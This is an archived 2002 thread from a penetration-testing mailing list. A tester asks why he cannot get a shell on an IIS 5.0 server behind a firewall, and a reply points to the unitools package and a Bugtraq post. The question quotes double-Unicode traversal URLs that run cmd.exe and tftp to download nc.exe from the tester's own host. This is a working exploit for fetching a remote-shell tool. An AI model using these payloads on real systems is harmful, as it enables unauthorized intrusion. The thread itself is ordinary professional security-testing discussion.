Find the unitools distribution. If the firewall is the issue, that should do the trick. The following link should help to get you going. http://marc.theaimsgroup.com/?l=bugtraq&m=98040935006042&w=2 Good Luck! Rico > -----Original Message----- > From: Gaziel, Avishay [mailto:agazielat_private] > Sent: Tuesday, July 09, 2002 10:33 AM > To: PEN-TESTat_private > Subject: Can't get a shell > > > Hi All, > Situation: > An IIS5.0 vulnerable to unicode.("double Unicode" i.e. > ..%255c.. etc.) > IIS sitting behind a firewall. > Problem: > host/scripts/..%255c.........../winnt/system32/cmd.exe?/tftp+- > i+myserver+get > +nc.exe doesn't work > I keep getting (from my pumpkin tftp server) an error message > saying that > there's something wrong with the variables. > another strange thing is that even if I don't get the error > message the tftp > session will not start and will timeout, if I deny access I > keep getting > access requests from the IIS.(Pumpkin is configured to prompt > whenever a > download/upload starts) > What have I tried to do? > Use > host/scripts/..%255c.........../winnt/system32/tftp.exe+-i+mys erver+get+nc.e > xe instead of the above mentioned...doesn't work as well. > What do I think is wrong? > The FW is blocking all udp traffic out. > What do I need? > 1. Suggestions > 2.Workarounds > Avishay > > > > > > ************************************************************** > *************** > The information in this email is confidential and may be > legally privileged. > It is intended solely for the addressee. Access to this email > by anyone else > is unauthorized. > > If you are not the intended recipient, any disclosure, > copying, distribution > or any action taken or omitted to be taken in reliance on it, > is prohibited > and may be unlawful. When addressed to our clients any > opinions or advice > contained in this email are subject to the terms and > conditions expressed in > the governing KPMG client engagement letter. > ************************************************************** > *************** > > -------------------------------------------------------------- > -------------- > This list is provided by the SecurityFocus Security > Intelligence Alert (SIA) > Service. For more information on SecurityFocus' SIA service which > automatically alerts you to the latest security > vulnerabilities please see: > https://alerts.securityfocus.com/ > > ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Thu Jul 11 2002 - 16:25:19 PDT